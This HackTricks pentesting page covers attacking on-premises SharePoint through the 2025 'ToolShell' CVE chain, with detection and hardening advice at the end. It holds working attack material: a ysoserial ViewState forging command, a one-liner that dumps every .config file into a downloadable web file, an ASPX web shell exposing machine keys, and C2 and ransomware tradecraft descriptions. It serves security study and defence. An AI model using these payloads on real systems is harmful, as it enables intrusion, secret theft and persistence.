Microsoft SharePoint – Pentesting & Exploitation

Reading time: 7 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).

1. Quick enumeration

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (a.k.a. “ToolShell”)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> allows arbitrary Server-Side Include code to be injected in the page which is later compiled by ASP.NET. An attacker can embed C# that executes Process.Start() and drop a malicious ViewState.

2.2 CVE-2025-49706 – Improper Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine the site context. By pointing it to /_layouts/15/, MFA/SSO enforced at the root site can be bypassed unauthenticated.

2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE

Once the attacker controls a gadget in ToolPane.aspx they can post an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe leading to code execution.

If signing is enabled, steal the ValidationKey/DecryptionKey from any web.config (see 2.4) and forge the payload with ysoserial.net or ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
    ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Sending a crafted Source parameter to ToolPane.aspx (e.g. ../../../../web.config) returns the targeted file, allowing leakage of:

<machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
connection strings & secrets.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.

3.2 Deploy a Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Decoded payload example (shortened):

csharp

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>

Written to:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Obfuscated variant (variation-3)

Same shell but:

dropped under ...\15\TEMPLATE\LAYOUTS\
variable names reduced to single letters
Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)

Recent incident-response investigations (Unit42 “Project AK47”) show how attackers leverage the ToolShell chain after initial RCE to deploy a dual-channel C2 implant and ransomware in SharePoint environments:

AK47C2 – `dnsclient` variant

Hard-coded DNS server: 10.7.66.10 communicating with authoritative domain update.updatemicfosoft.com.
Messages are JSON objects XOR-encrypted with the static key VHBD@H, hex-encoded and embedded as sub-domain labels.
```
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
```
Long queries are chunked and prefixed with s, then re-assembled server-side.

Server replies in TXT records carrying the same XOR/hex scheme:

{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}

Version 202504 introduced a simplified format <COMMAND>::<SESSION_KEY> and chunk markers 1, 2, a.

AK47C2 – `httpclient` variant

Re-uses the exact JSON & XOR routine but sends the hex blob in the HTTP POST body via libcurl (CURLOPT_POSTFIELDS, etc.).
Same task/result workflow allowing:
- Arbitrary shell command execution.
- Dynamic sleep interval and kill-switch instructions.

X2ANYLOCK ransomware

64-bit C++ payload loaded through DLL side-loading (see below).
Employs AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the extension .x2anylock.
Recursively encrypts local drives and discovered SMB shares; skips system paths.
Drops clear-text note How to decrypt my data.txt embedding a static Tox ID for negotiations.

Contains an internal kill-switch:

if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

Attacker writes dllhijacked.dll/My7zdllhijacked.dll next to a legitimate 7z.exe.
SharePoint-spawned w3wp.exe launches 7z.exe, which loads the malicious DLL because of Windows search order, invoking the ransomware entrypoint in memory.
A separate LockBit loader observed (bbb.msi ➜ clink_x86.exe ➜ clink_dll_x86.dll) decrypts shell-code and performs DLL hollowing into d3dl1.dll to run LockBit 3.0.

info

The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.

4. Detection ideas

Telemetry	Why it is suspicious
`w3wp.exe → cmd.exe`	Worker process should rarely spawn shell
`cmd.exe → powershell.exe -EncodedCommand`	Classic lolbin pattern
File events creating `debug_dev.js` or `spinstall0.aspx`	IOCs straight from ToolShell
`ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Module logs)	Public PoCs invoke this page

Example XDR / Sysmon rule (pseudo-XQL):

proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")

5. Hardening & Mitigation

Patch – July 2025 security updates fix all four CVEs.
Rotate every <machineKey> and ViewState secrets after compromise.
Remove LAYOUTS write permission from WSS_WPG & WSS_ADMIN_WPG groups.
Block external access to /_layouts/15/ToolPane.aspx at proxy/WAF level.
Enable ViewStateUserKey, MAC enabled, and custom EventValidation.

IIS post-exploitation & web.config abuse:

IIS - Internet Information Services

References

tip

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.